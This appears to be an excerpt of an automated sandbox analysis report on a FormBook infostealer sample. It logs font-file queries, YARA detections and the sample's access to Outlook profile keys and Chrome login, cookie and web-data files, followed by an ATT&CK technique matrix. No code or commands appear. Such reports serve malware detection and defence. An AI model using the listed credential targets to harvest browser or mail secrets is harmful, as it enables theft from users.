          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Product24573.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception512
          Process Injection          		11
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		1
          Input Capture          		2
          Process Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth3
